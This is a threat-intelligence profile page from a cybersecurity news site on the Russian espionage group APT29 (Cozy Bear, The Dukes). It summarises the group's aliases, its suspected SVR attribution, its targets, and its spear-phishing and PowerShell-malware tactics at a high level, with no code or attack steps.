Menu

  • Alerts
  • Incidents
  • News
  • APTs
  • Cyber Decoded
  • Cyber Hygiene
  • Cyber Review
  • Cyber Tips
  • Definitions
  • Malware
  • Threat Actors
  • Tutorials

Useful Tools

  • Password generator
  • Report an incident
  • Report to authorities
No Result
View All Result
CTF Hack Havoc
CyberMaterial
  • Education
    • Cyber Decoded
    • Definitions
  • Information
    • Alerts
    • Incidents
    • News
  • Insights
    • Cyber Hygiene
    • Cyber Review
    • Tips
    • Tutorials
  • Support
    • Contact Us
    • Report an incident
  • About
    • About Us
    • Advertise with us
Get Help
Hall of Hacks
  • Education
    • Cyber Decoded
    • Definitions
  • Information
    • Alerts
    • Incidents
    • News
  • Insights
    • Cyber Hygiene
    • Cyber Review
    • Tips
    • Tutorials
  • Support
    • Contact Us
    • Report an incident
  • About
    • About Us
    • Advertise with us
Get Help
No Result
View All Result
Hall of Hacks
CyberMaterial
No Result
View All Result
Home panic

APT29 – Cozy Bear – RUSSIA

August 13, 2021
Reading Time: 3 mins read
in APT
APT29 – Cozy Bear – RUSSIA

APT29 – The Dukes are a well-resourced, highly dedicated and organized cyberespionage group that we believe has been working for the Russian Federation since at least 2008 to collect intelligence in support of foreign and security policy decision-making. The Dukes primarily target Western governments and related organizations, such as government ministries and agencies, political think tanks, and governmental subcontractors. Their targets have also included the governments of members of the Commonwealth of Independent States; Asian, African, and Middle Eastern governments; organizations associated with Chechen extremism; and Russian speakers engaged in the illicit trade of controlled substances and drugs. The Dukes are known to employ a vast arsenal of malware toolsets, which we identify as MiniDuke, CosmicDuke, OnionDuke, CozyDuke, CloudDuke, SeaDuke, HammerDuke, PinchDuke, and GeminiDuke. In recent years, the Dukes have engaged in apparently biannual large-scale spear-phishing campaigns against hundreds or even thousands of recipients associated with governmental institutions and affiliated organizations.

Name: Cozy Bear (CrowdStrike), The Dukes (F-Secure), Group 100 (Talos), Yttrium (Microsoft), Iron Hemlock (SecureWorks), Minidionis (Palo Alto), CloudLook (Kaspersky), ATK 7 (Thales), ITG11 (IBM )UNC2452 (FireEye), Dark Halo (Volexity), SolarStorm (Palo Alto), StellarParticle (CrowdStrike), Nobelium (Microsoft), Iron Ritual (SecureWorks)

Location: Russia

Suspected attribution: Russia’s Foreign Intelligence Service (SVR)

Date of initial activity: 2008

Targets: Government networks in Europe and NATO member countries, research institutes, and think tanks.

Motivation: Information theft and espionage

Associated tools: Dark Halo, StellarParticle, NOBELIUM, UNC2452, YTTRIUM, The Dukes, Cozy Bear, CozyDuke

Attack vectors:  The group primarily uses campaigns ranging from widespread emails crafted to look like high-volume spam messages, to targeted spear phishing emails addressed to only a few individuals that contain malicious attachments with customized content.

How they work:  In some incidents, IRON HEMLOCK appears to have used compromised third-party networks to conduct attacks; for example, reports linked IRON HEMLOCK to the April 2015 breach of an unclassified White House network, and some sources claimed that the initial phishing emails were distributed from U.S. State Department email servers. IRON HEMLOCK also compromised the U.S. Democratic National Committee’s network in 2016.

IRON HEMLOCK (also known as The Dukes or APT29) is a cyber-espionage group that has been operating since at least 2008. In 2018, media reports detailing a Dutch counterintelligence operation against IRON HEMLOCK strongly suggested that the group is a component of the SVR, Russia’s foreign intelligence agency. This evidence, combined with observations of the threat group’s activities and targeting, led CTU researchers to assess with high confidence that IRON HEMLOCK is operated by the one of the Russian intelligence services and with moderate confidence specifically the SVR. The group has targeted government, foreign policy, and security-related organizations in former Soviet countries (Russia’s ‘near-abroad’) and NATO member countries. CTU analysis suggests that it is tasked with stealing information to support strategic foreign policy and political decision-making. Given the SVR’s remit, IRON HEMLOCK is likely used to support traditional SVR espionage operations overseas. IRON HEMLOCK has evolved a range of intrusion methods and capabilities that have enabled the group to retain its effectiveness despite multiple public disclosures.

IRON HEMLOCK operations observed by CTU researchers since 2016 have been stealthy and targeted, using multiple layers of encryption within malware and to protect communications between malware and C2 servers. The group seems to be adept at developing and deploying custom PowerShell malware and may even develop PowerShell-based tools specific to a single operation. Third party reporting in 2019 also suggests heavy use of steganography to disguise its malware. Cozy Bear’s activities appear to be limited to strategic targets or perhaps to support broader SVR operations, so the volume of activity is likely far lower than other Russian government groups.

Tags: Advanced Persistent ThreatAPT29Cozy BearRussiaThe DukesYttrium
ADVERTISEMENT

Related Posts

APT-C-60 (APT) – Threat Actor

APT-C-60 (APT) – Threat Actor

February 16, 2025
COLDRIVER (APT) – Threat Actor

COLDRIVER (APT) – Threat Actor

February 13, 2025
UTG-Q-010 (APT) – Threat Actor

UTG-Q-010 (APT) – Threat Actor

February 12, 2025
Actor240524 (APT) – Threat Actor

Actor240524 (APT) – Threat Actor

February 10, 2025
T-APT-04 (SideWinder) – Threat Actor

T-APT-04 (SideWinder) – Threat Actor

January 30, 2025
Evasive Panda (APT) – Threat Actor

Evasive Panda (APT) – Threat Actor

January 30, 2025

Latest Alerts

Fileless Remcos RAT Delivery Via LNK Files

FBI Warns of AI Voice Phishing Scams

APT28 RoundPress Webmail Hack Steals Emails

Google Patches Chrome Account Takeover Bug

Horabot Malware Targets LatAm Via Phishing

HTTPBot DDoS Threat To Windows Systems

Subscribe to our newsletter

    Latest Incidents

    Hackers Target Swiss Reserve Power Plant

    Coinbase Insider Attack Exposed User Data

    Cyberattack Hits J Batista Group

    Dior Breach Exposes Asian Customer Data

    Australian Human Rights Body Files Leaked

    Nucor Cyberattack Halts Plants Networks

    CyberMaterial Logo
    • About Us
    • Contact Us
    • Jobs
    • Legal and Privacy Policy
    • Site Map

    © 2025 | CyberMaterial | All rights reserved

    Welcome Back!

    Login to your account below

    Forgotten Password?

    Retrieve your password

    Please enter your username or email address to reset your password.

    Log In

    Add New Playlist

    No Result
    View All Result
    • Alerts
    • Incidents
    • News
    • Cyber Decoded
    • Cyber Hygiene
    • Cyber Review
    • Definitions
    • Malware
    • Cyber Tips
    • Tutorials
    • Advanced Persistent Threats
    • Threat Actors
    • Report an incident
    • Password Generator
    • About Us
    • Contact Us
    • Advertise with us

    Copyright © 2025 CyberMaterial